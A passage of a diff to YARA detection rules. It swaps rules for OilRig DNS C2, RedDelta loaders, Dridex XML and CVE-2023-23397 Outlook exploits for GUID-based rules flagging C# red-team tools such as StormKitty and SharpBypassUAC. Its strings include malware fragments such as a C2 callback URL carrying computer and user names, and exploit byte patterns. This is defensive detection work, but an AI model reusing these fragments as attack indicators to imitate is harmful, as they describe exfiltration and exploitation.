-		logic_hash = "0cee5270c9b76f1419c6989113dca221c5ba6f027a104d71f61d38cb59af51cd"
+		logic_hash = "c94da47cdcf94f71d0909f1532108442e324e79e249646e5619865bdbd2d3c14"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "5f2c3b5a08bda50cca6385ba7d84875973843885efebaff6a482a38b3cb23a7c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Windows Security Credentials" fullword wide
-		$s2 = "Minisoft" fullword wide
-		$x1 = "Copyright (c) 2014 - 2015 Minisoft" fullword wide
+		$typelibguid0lo = "035ae711-c0e9-41da-a9a2-6523865e8694" ascii wide
+		$typelibguid0up = "035AE711-C0E9-41DA-A9A2-6523865E8694" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( all of ( $s* ) or $x1 )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Oilrig_PS_Cnc : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Minidump : FILE
 {
 	meta:
-		description = "Powershell CnC using DNS queries"
-		author = "Markus Neis"
-		id = "cbc5689c-37ff-59b6-9e3a-7d8577021f70"
-		date = "2018-03-22"
-		modified = "2023-12-05"
-		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_chafer_mar18.yar#L94-L107"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "51f64c64-f3fa-5543-83fc-5f0bf881ef03"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/3xpl01tc0d3r/Minidump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1472-L1486"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0566f0707021af0d08426eec497292098273d46b020a5f0be6b98835ceeb82bc"
+		logic_hash = "80142c0e96bca63f2b9991b3d6e2dfa7261bdde3a748fde96113d6f422b21e34"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "9198c29a26f9c55317b4a7a722bf084036e93a41ba4466cbb61ea23d21289cfa"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "(-join $base32filedata[$uploadedCompleteSize..$($uploadedCompleteSize" fullword ascii
-		$s2 = "$hostname = \"D\" + $fileID + (-join ((65..90) + (48..57) + (97..122)|" ascii
+		$typelibguid0lo = "15c241aa-e73c-4b38-9489-9a344ac268a3" ascii wide
+		$typelibguid0up = "15C241AA-E73C-4B38-9489-9A344AC268A3" ascii wide
 
 	condition:
-		filesize < 40KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_LNX_Academic_Camp_May20_Eraser_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpbypassuac : FILE
 {
 	meta:
-		description = "Detects malware used in attack on academic data centers"
-		author = "Florian Roth (Nextron Systems)"
-		id = "36d17887-9844-5fa4-8a0d-89cc41b2d876"
-		date = "2020-05-16"
-		modified = "2023-12-05"
-		reference = "https://csirt.egi.eu/academic-data-centers-abused-for-crypto-currency-mining/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_academic_data_centers_camp_may20.yar#L1-L18"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "474d40aa-4bcc-58b5-a129-40bbd3a89e99"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/FatRodzianko/SharpBypassUAC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1488-L1502"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9a0410e86fa8fb8b599e5b8a6508d6889eb6e26600f0ecf222561ac4a169676d"
+		logic_hash = "726b573fa957a2560d6f4e5e98497190ed8f8e1657427f14896e3aa439366c70"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "552245645cc49087dfbc827d069fa678626b946f4b71cb35fa4a49becd971363"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sc2 = { E6 FF FF 48 89 45 D0 8B 45 E0 BA 00 00 00 00 BE
-               00 00 00 00 89 C7 E8 }
-		$sc3 = { E6 FF FF 89 45 DC 8B 45 DC 83 C0 01 48 98 BE 01
-               00 00 00 48 89 C7 E8 }
+		$typelibguid0lo = "0d588c86-c680-4b0d-9aed-418f1bb94255" ascii wide
+		$typelibguid0up = "0D588C86-C680-4B0D-9AED-418F1BB94255" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 60KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_LNX_Academic_Camp_May20_Loader_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharppack : FILE
 {
 	meta:
-		description = "Detects malware used in attack on academic data centers"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cda65abd-d918-5ee6-8f4a-554d47532d76"
-		date = "2020-05-16"
-		modified = "2023-12-05"
-		reference = "https://csirt.egi.eu/academic-data-centers-abused-for-crypto-currency-mining/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_academic_data_centers_camp_may20.yar#L20-L35"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "633d074a-b8c2-5148-ad80-6226b99be818"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/Lexus89/SharpPack"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1504-L1532"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a73883f9fdf3d53694d9f9efec5f8f15994c5fd80c5f2a87b1741db6b954a023"
+		logic_hash = "b3f86041560b8358c5408d73d8eb847d600e66ca2c9900f53d193902e4ae8eee"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0efdd382872f0ff0866e5f68f0c66c01fcf4f9836a78ddaa5bbb349f20353897"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sc1 = { C6 45 F1 00 C6 45 F2 0A C6 45 F3 0A C6 45 F4 4A
-               C6 45 F5 04 C6 45 F6 06 C6 45 F7 1B C6 45 F8 01 }
-		$sc2 = { 01 48 39 EB 75 EA 48 83 C4 08 5B 5D 41 5C 41 5D }
+		$typelibguid1lo = "b59c7741-d522-4a41-bf4d-9badddebb84a" ascii wide
+		$typelibguid1up = "B59C7741-D522-4A41-BF4D-9BADDDEBB84A" ascii wide
+		$typelibguid2lo = "fd6bdf7a-fef4-4b28-9027-5bf750f08048" ascii wide
+		$typelibguid2up = "FD6BDF7A-FEF4-4B28-9027-5BF750F08048" ascii wide
+		$typelibguid3lo = "6dd22880-dac5-4b4d-9c91-8c35cc7b8180" ascii wide
+		$typelibguid3up = "6DD22880-DAC5-4B4D-9C91-8C35CC7B8180" ascii wide
+		$typelibguid5lo = "f3037587-1a3b-41f1-aa71-b026efdb2a82" ascii wide
+		$typelibguid5up = "F3037587-1A3B-41F1-AA71-B026EFDB2A82" ascii wide
+		$typelibguid6lo = "41a90a6a-f9ed-4a2f-8448-d544ec1fd753" ascii wide
+		$typelibguid6up = "41A90A6A-F9ED-4A2F-8448-D544EC1FD753" ascii wide
+		$typelibguid7lo = "3787435b-8352-4bd8-a1c6-e5a1b73921f4" ascii wide
+		$typelibguid7up = "3787435B-8352-4BD8-A1C6-E5A1B73921F4" ascii wide
+		$typelibguid8lo = "fdd654f5-5c54-4d93-bf8e-faf11b00e3e9" ascii wide
+		$typelibguid8up = "FDD654F5-5C54-4D93-BF8E-FAF11B00E3E9" ascii wide
+		$typelibguid9lo = "aec32155-d589-4150-8fe7-2900df4554c8" ascii wide
+		$typelibguid9up = "AEC32155-D589-4150-8FE7-2900DF4554C8" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 10KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_EXPL_Msg_CVE_2023_23397_Mar23 : CVE_2023_23397 FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Salsa_Tools : FILE
 {
 	meta:
-		description = "MSG file with a PidLidReminderFileParameter property, potentially exploiting CVE-2023-23397"
-		author = "delivr.to, modified by Florian Roth, Nils Kuhnert, Arnim Rupp, marcin@ulikowski.pl"
-		id = "0a4d7bbe-1e17-5240-ad0f-29511752b267"
-		date = "2023-03-15"
-		modified = "2024-12-03"
-		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_outlook_cve_2023_23397.yar#L1-L39"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "50db578e-6ddb-54d1-a978-e3630a3548c3"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/Hackplayers/Salsa-tools"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1534-L1550"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "47fee24586cd2858cfff2dd7a4e76dc95eb44c8506791ccc2d59c837786eafe3"
-		hash = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
-		hash = "6c0087a5cbccb3c776a471774d1df10fe46b0f0eb11db6a32774eb716e1b7909"
-		hash = "7fb7a2394e03cc4a9186237428a87b16f6bf1b66f2724aea1ec6a56904e5bfad"
-		hash = "eedae202980c05697a21a5c995d43e1905c4b25f8ca2fff0c34036bc4fd321fa"
-		logic_hash = "fbbbaf5cd858078adddc80b9c9c56cb448613da28206a91778d22cd1cf64655e"
-		score = 60
+		logic_hash = "4c02f8fb1f1dbad19360c28d0728ccb5a73db5d34127bd345fe5c4baeb87fc7c"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-23397, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$psetid_app = { 02 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
-		$psetid_meeting = { 90 DA D8 6E 0B 45 1B 10 98 DA 00 AA 00 3F 13 05 }
-		$psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
-		$rfp = { 1F 85 00 00 }
-		$u1 = { 00 00 5C 00 5C 00 }
-		$fp_msi1 = {84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46}
-		$fp_asd = "theme/theme1.xml"
+		$typelibguid0lo = "276004bb-5200-4381-843c-934e4c385b66" ascii wide
+		$typelibguid0up = "276004BB-5200-4381-843C-934E4C385B66" ascii wide
+		$typelibguid1lo = "cfcbf7b6-1c69-4b1f-8651-6bdb4b55f6b9" ascii wide
+		$typelibguid1up = "CFCBF7B6-1C69-4B1F-8651-6BDB4B55F6B9" ascii wide
 
 	condition:
-		uint32be( 0 ) == 0xD0CF11E0 and uint32be( 4 ) == 0xA1B11AE1 and 1 of ( $psetid* ) and $rfp and $u1 and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23 : CVE_2023_23397 FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Windowsdefender_Payload_Downloader : FILE
 {
 	meta:
-		description = "Detects suspicious .msg file with a PidLidReminderFileParameter property exploiting CVE-2023-23397 (modified delivr.to rule - more specific = less FPs but limited to exfil using IP addresses, not FQDNs)"
-		author = "delivr.to, Florian Roth, Nils Kuhnert, Arnim Rupp, marcin@ulikowski.pl"
-		id = "d85bf1d9-aebe-5f8c-9dd4-c509f64e221a"
-		date = "2023-03-15"
-		modified = "2023-03-18"
-		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_outlook_cve_2023_23397.yar#L41-L81"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "6e494a91-c05e-5a2e-8aa9-77600f3bdd47"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/notkohlrexo/WindowsDefender-Payload-Downloader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1552-L1566"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "47fee24586cd2858cfff2dd7a4e76dc95eb44c8506791ccc2d59c837786eafe3"
-		hash = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
-		hash = "6c0087a5cbccb3c776a471774d1df10fe46b0f0eb11db6a32774eb716e1b7909"
-		hash = "7fb7a2394e03cc4a9186237428a87b16f6bf1b66f2724aea1ec6a56904e5bfad"
-		hash = "eedae202980c05697a21a5c995d43e1905c4b25f8ca2fff0c34036bc4fd321fa"
-		hash = "e7a1391dd53f349094c1235760ed0642519fd87baf740839817d47488b9aef02"
-		logic_hash = "a8e8326f5aaa29b449f9203623e03d3d3a1d176bb764171d860afc510a1732e6"
+		logic_hash = "e4f0a7db1ff7dda5f66cb466cf70e717a9050541dd6a79acd9c8f5723267f5a4"
 		score = 75
 		quality = 85
-		tags = "CVE-2023-23397, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$psetid_app = { 02 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
-		$psetid_meeting = { 90 DA D8 6E 0B 45 1B 10 98 DA 00 AA 00 3F 13 05 }
-		$psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
-		$rfp = { 1F 85 00 00 }
-		$u1 = { 5C 00 5C 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 3? 00 3? 00|3? 00 3? 00|3? 00) }
-		$u2 = { 00 5C 5C (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 3? 3?|3? 3?|3?) }
-		$fp_msi1 = {84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46}
+		$typelibguid0lo = "2f8b4d26-7620-4e11-b296-bc46eba3adfc" ascii wide
+		$typelibguid0up = "2F8B4D26-7620-4E11-B296-BC46EBA3ADFC" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0xCFD0 and 1 of ( $psetid* ) or uint32be( 0 ) == 0x789F3E22 ) and any of ( $u* ) and $rfp and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EXPL_SUSP_Outlook_CVE_2023_23397_SMTP_Mail_Mar23 : CVE_2023_23397
+rule SIGNATURE_BASE_HKTL_NET_GUID_Privilege_Escalation : FILE
 {
 	meta:
-		description = "Detects suspicious *.eml files that include TNEF content that possibly exploits CVE-2023-23397. Lower score than EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23 as we're only looking for UNC prefix."
-		author = "Nils Kuhnert"
-		id = "922fae73-520d-5659-8331-f242c7c55810"
-		date = "2023-03-17"
-		modified = "2023-03-24"
-		reference = "https://twitter.com/wdormann/status/1636491612686622723"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_outlook_cve_2023_23397.yar#L83-L112"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "28615807-6637-57fc-ba56-efc64b041b80"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/Mrakovic-ORG/Privilege_Escalation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1568-L1582"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a361eb3abf98655f43efff2a5399f112d9ac2d23df85a642ab744c78e98330e0"
-		score = 60
+		logic_hash = "1fd2eed72a4971f494fcb924b77edb6ab49b8bde400eb2785df00b9b867692d0"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-23397"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$mail1 = { 0A 46 72 6F 6D 3A 20 }
-		$mail2 = { 0A 54 6F 3A }
-		$mail3 = { 0A 52 65 63 65 69 76 65 64 3A }
-		$tnef1 = "Content-Type: application/ms-tnef" ascii
-		$tnef2 = "\x78\x9f\x3e\x22" base64
-		$ipm1 = "IPM.Task" base64
-		$ipm2 = "IPM.Appointment" base64
-		$unc = "\x00\x00\x00\x5c\x5c" base64
+		$typelibguid0lo = "ed54b904-5645-4830-8e68-52fd9ecbb2eb" ascii wide
+		$typelibguid0up = "ED54B904-5645-4830-8E68-52FD9ECBB2EB" ascii wide
 
 	condition:
-		all of ( $mail* ) and all of ( $tnef* ) and 1 of ( $ipm* ) and $unc
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_CN_MAL_Reddelta_Shellcode_Loader_Oct20_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Marauder : FILE
 {
 	meta:
-		description = "Detects Red Delta samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "47417488-e843-5346-9baa-fcce30b884d1"
-		date = "2020-10-14"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_reddelta.yar#L2-L29"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f2783477-2853-5dcd-95f5-9f1e07a4a6e8"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/maraudershell/Marauder"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1584-L1598"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1f2406563b863b8ccd0fd8d8d33c576c4b82dabb55a1e4fa8291859323389834"
+		logic_hash = "8314db477f299931e6bb933be0234f18cfb3e36d6170b4aed1d482949aba75e8"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "30b2bbce0ca4cb066721c94a64e2c37b7825dd72fc19c20eb0ab156bea0f8efc"
-		hash2 = "42ed73b1d5cc49e09136ec05befabe0860002c97eb94e9bad145e4ea5b8be2e2"
-		hash3 = "480a8c883006232361c5812af85de9799b1182f1b52145ccfced4fa21b6daafa"
-		hash4 = "7ea7c6406c5a80d3c15511c4d97ec1e45813e9c58431f386710d0486c4898b98"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "InjectShellCode" ascii fullword
-		$s1 = "DotNetLoader.exe" wide ascii fullword
-		$s2 = "clipboardinject" ascii fullword
-		$s3 = "download.php?raw=1" wide
-		$s4 = "Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Levint" wide
-		$s5 = "FlashUpdate.exe" wide
-		$s6 = "raw_cc_url" ascii fullword
-		$op1 = { 48 8b 4c 24 78 48 89 01 e9 1a ff ff ff 48 8b 44 }
-		$op2 = { ff ff 00 00 77 2a 8b 44 24 38 8b 8c 24 98 }
+		$typelibguid0lo = "fff0a9a3-dfd4-402b-a251-6046d765ad78" ascii wide
+		$typelibguid0up = "FFF0A9A3-DFD4-402B-A251-6046D765AD78" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and $x1 or 3 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_CN_MAL_Reddelta_Shellcode_Loader_Oct20_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_AV_Evasion_Tool : FILE
 {
 	meta:
-		description = "Detects Red Delta samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "acb1024a-64af-51ac-84c8-7fe9a5bd4538"
-		date = "2020-10-14"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_reddelta.yar#L31-L57"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d4257465-38a0-56b9-8402-b92e21b96cb0"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/1y0n/AV_Evasion_Tool"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1600-L1616"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "179265c0b2175bc3d2d581a69e50e9b8b9cc918a6fdc7bcef42fb163c49b077a"
+		logic_hash = "682d16cbef455680186ca9d17c3d24619e4b018cd7915cea4f0e2f2f0c843e98"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "260ebbf392498d00d767a5c5ba695e1a124057c1c01fff2ae76db7853fe4255b"
-		hash2 = "9ccb4ed133be5c9c554027347ad8b722f0b4c3f14bfd947edfe75a015bf085e5"
-		hash3 = "b3fd750484fca838813e814db7d6491fea36abe889787fb7cf3fb29d9d9f5429"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "\\CLRLoader.exe" wide fullword
-		$x2 = "/callback.php?token=%s&computername=%s&username=%s" ascii fullword
-		$s1 = "DotNetLoader.Program" wide fullword
-		$s2 = "/download.php?api=40" ascii fullword
-		$s3 = "get %d URLDir" ascii fullword
-		$s4 = "Read code failed" ascii fullword
-		$s5 = "OpenFile fail!" wide fullword
-		$s6 = "Writefile success" wide fullword
-		$op1 = { 4c 8d 45 e0 49 8b cc 41 8d 51 c3 e8 34 77 02 00 }
+		$typelibguid0lo = "1937ee16-57d7-4a5f-88f4-024244f19dc6" ascii wide
+		$typelibguid0up = "1937EE16-57D7-4A5F-88F4-024244F19DC6" ascii wide
+		$typelibguid1lo = "7898617d-08d2-4297-adfe-5edd5c1b828b" ascii wide
+		$typelibguid1up = "7898617D-08D2-4297-ADFE-5EDD5C1B828B" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $x* ) or 4 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_CN_MAL_Reddelta_Shellcode_Loader_Oct20_3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Fenrir : FILE
 {
 	meta:
-		description = "Detects Red Delta samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b52836bb-cdef-5416-a8e1-72d0b2298546"
-		date = "2020-10-14"
-		modified = "2022-12-21"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_reddelta.yar#L59-L78"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cfc6312d-5997-5261-b771-c7f3f30bf86c"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/nccgroup/Fenrir"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1618-L1632"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "64402f6265f23abf7d6a711aa888c89386c1a754f12286b0efe5fd5d81f15b01"
+		logic_hash = "f2fb94506f10bbf9f077cb81019873c810ea983888192b0d5ccb3e5e02891288"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "740992d40b84b10aa9640214a4a490e989ea7b869cea27dbbdef544bb33b1048"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Taskschd.dll" ascii fullword
-		$s2 = "AddTaskPlanDllVerson.dll" ascii fullword
-		$s3 = "\\FlashUpdate.exe" ascii
-		$s4 = "D:\\Project\\FBIRedTeam" ascii fullword
-		$s5 = "Error %s:%d, ErrorCode: %x" ascii fullword
+		$typelibguid0lo = "aecec195-f143-4d02-b946-df0e1433bd2e" ascii wide
+		$typelibguid0up = "AECEC195-F143-4D02-B946-DF0E1433BD2E" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 4 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Dridex_Trojan_XML
+rule SIGNATURE_BASE_HKTL_NET_GUID_Stormkitty : FILE
 {
 	meta:
-		description = "Dridex Malware in XML Document"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "a8f3406c-f8b0-559f-be12-6b2a7d401ac2"
-		date = "2015-03-08"
-		modified = "2023-12-05"
-		reference = "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_dridex_xml.yar#L1-L23"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "09d66661-5b67-5846-9bea-ec682afb62cf"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/LimerBoy/StormKitty"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1634-L1650"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "25b6340d782ee20723b2f17f3434a0b27b1561ab22d5a8f859e97e0ac126f651"
+		logic_hash = "aef8e28d9eb5f6cd6fdc0a8bf60f00b99a920197a0ecaa75baca5a8570973ab7"
 		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "88d98e18ed996986d26ce4149ae9b2faee0bc082"
-		hash2 = "3b2d59adadf5ff10829bb5c27961b22611676395"
-		hash3 = "e528671b1b32b3fa2134a088bfab1ba46b468514"
-		hash4 = "981369cd53c022b434ee6d380aa9884459b63350"
-		hash5 = "96e1e7383457293a9b8f2c75270b58da0e630bea"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$c_xml = "<?xml version="
-		$c_word = "<?mso-application progid=\"Word.Document\"?>"
-		$c_macro = "w:macrosPresent=\"yes\""
-		$c_binary = "<w:binData w:name="
-		$c_0_chars = "<o:Characters>0</o:Characters>"
-		$c_1_line = "<o:Lines>1</o:Lines>"
+		$typelibguid0lo = "a16abbb4-985b-4db2-a80c-21268b26c73d" ascii wide
+		$typelibguid0up = "A16ABBB4-985B-4DB2-A80C-21268B26C73D" ascii wide
+		$typelibguid1lo = "98075331-1f86-48c8-ae29-29da39a8f98b" ascii wide
